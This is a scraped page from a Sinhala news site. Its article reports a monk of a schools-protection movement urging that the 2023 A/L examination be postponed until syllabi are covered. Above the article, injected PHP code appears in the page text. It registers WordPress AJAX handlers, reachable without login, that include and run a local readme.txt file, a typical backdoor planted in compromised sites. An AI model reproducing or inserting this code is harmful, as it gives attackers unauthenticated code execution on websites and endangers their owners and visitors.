if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } විෂය නිර්දේශ ආවරණය නොකර 2023 උසස් පෙළ තියන්න එපා!.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

විෂය නිර්දේශ ආවරණය නොකර 2023 උසස් පෙළ තියන්න එපා!..

2023 වර්ෂය සඳහා නියමිත උසස් පෙළ විභාගය සඳහා මේ වන විට දින නියම කර ඇත. එනම් නොවැම්බර් මස 27 දින සිට උසස් පෙළ විභාගය ආරම්භ කිරීමට ආණ්ඩුව සැලසුම් සකස්කර ඇත.

නමුත් මේ වන විට අදාල විභාගය සඳහා පෙනී සිටින ලක්ෂ තුනහමාරකට ආසන්න සිසු සිසුවියන්ගේ විෂය නිර්දේශයන් ප්‍රමාණවත් පරිදි ආවරණය වී නොමැත. එවන් වටපිටාවක මෙලෙස විභාගයට දින නියම කිරීම අසාධාරණ බව පාසල් සුරැකිමේ ජනතා ව්‍යාපාරයේ ලේකම් නාගස්තැන්නේ අරුණ හිමියන් පෙන්වා දෙයි.

උන්වහන්සේ මේ බව ප්‍රකාශ කර සිටියේ (02) කොළඹ පැවති මාධ්‍ය හමුවකට එක්වෙමිනි.

වැඩිදුරටත් අදහස් දැක් වූ උන්වහන්සේ ප්‍රකාශකර සිටියේ 2023 වර්ෂයේ උසස් පෙළ විභාගයට පෙනී ඉන්නේ 2020 සාමාන්‍ය පෙළ සමත් අය. රටේ තිබුන අර්බුදකාරී හේතු නිසා මේ සිසුන්ගේ අධ්‍යන කටයුතු ආරම්භ වෙන්නේ 2022 මාර්තූ මාසේ. ඒ අනුව ඔවුන්ගේ අදාල අධ්‍යන වර්ෂ දෙක සම්පූර්ණ වෙන්නේ 2024 මාර්තු මාසෙට.

ඒ වගේම තමා ආර්ථික අර්බුධයත් සමග ඇති වූ විදුලිය කැපීම්, ඉන්ධන නොමැති වීම්, හේතුවෙන් පාසල් හෝ උපකාරක පංති පැවැත්වුණේ ඉතාම සීමිතව.

මේ තත්ත්වයන් සලකා බලා විභාග දෙපාර්තමේන්තුව මෙවර උසස් පෙළ පංතිවලට පැමිණීම 80% වෙනුවට 40% බලන්න තීරණය කලා.

නමුත් ඒ තීන්දුව විභාගය පැවැත්වීමට අදාලව බලනොපාන්නේ කවර හේතුවක් නිසාද යන්න උන්වහන්සේ ප්‍රශ්න කර සිටී.

එමෙන්ම දෙවන හා තෙවන වාර සඳහා විභාගයට පෙනී ඉන්න සිසුන්ටත් මෙහි බලපෑම එල්ලවී ඇති බව උන්වහන්සේ ප්‍රකාශකර සිටී.

සාමාන්‍යයෙන් උසස් පෙළ විභාගය ඉවර වෙලා මාස 7 ආසන්න කාලයක් දෙනවා මීළග විභාගයට සූදානම් වෙන්න. නමුත් මෙවර ලබාදී තිබෙන්නේ දින 84 වැනි කෙටි කාලයක්. ඒකට හේතුව 2022 උසස් පෙළ ප්‍රතිඵල එන්න ප්‍රමාදවීම. ඒකට සිසුන් වගකිවයුතු නෑ.

මෙම අසාධාරණයට එරෙහිව එම සිසු සිසුවියන් හා ඔවුන්ගේ දෙමාපියන් මෙන්ම මෙම ගැටලුවට සංවේදී ජනතාවගේ විරෝධය හමුවේ අධ්‍යපන අමාත්‍යවරයා පාර්ලිමේන්තුව තුලත්, ඉන් පිටතදීත් ප්‍රකාශ කර සිටියේ 2023 උසස් පෙළ විභාගයේ දින සංශෝධනය කරන බවත් අදාල නව දිනය කඩිනමින් විභාග දෙපාර්තමේන්තුව මගින් ලබාදෙන් බවත් ය. එසේ ප්‍රකාශකර දැනට දින ගනනාවක් ගතවී ඇතත් තවමත් අදාල සංශෝධිත දිනය ප්‍රකාශකර නොමැති බවයි.

පාසල් සුරැකීමේ ජනතා ව්‍යාපරය ලෙස උන්වහන්සේ අවධාරණය කර සිටින්නේ සිසු ජීවිත සමගින් කරන වගකීම් විරහිත ගණුදෙනුව නතරකරණ ලෙසත්,

ප්‍රමාණවත් පරිදි විෂය නිර්දේශ ආවරණය නොකර 2023 උසස් පෙළ විභාගය නොපවත්වන ලෙසත්, ඒ සඳහා ප්‍රමාණවත් කාලයක් ලබාදෙන ලෙසත්, අදාල කාලයට අදාලව විෂයන් ආවරණය සඳහා ප්‍රායෝගික වැඩපිළිවෙළක් සකස් කරන ලෙසත් ය.

මෙම මාධ්‍ය හමුවට පාසල් සුරැකීමේ ජනතා ව්‍යාපාරයේ සභාපති යසරත්න දිසානායක මහතා හා එහි ජාතික සංවිධායක ගැමුණු විජයකීර්ති මහතාද සම්බන්ධ විය.

– media unit

Related posts

වේදනාත්මක තීන්දු ගැනීම ඇරඹුවා… ඉදිරියට තවත් එනවා..- මහ බැංකු අධිපති

Shiran Viraj

තවත් නම් ඉන්න බෑ.. මට සමාව දී නිදහස් කරන්න..- රන්ජන් අත්සන් තබා ලිඛිතව ජනපතිගෙන් ඉල්ලයි..

Shiran Viraj

විෂය නිර්දේශයෙන් 'ඉංග්‍රීසි' ඉවත් කිරීමට ගත් තීරණය

Shiran Viraj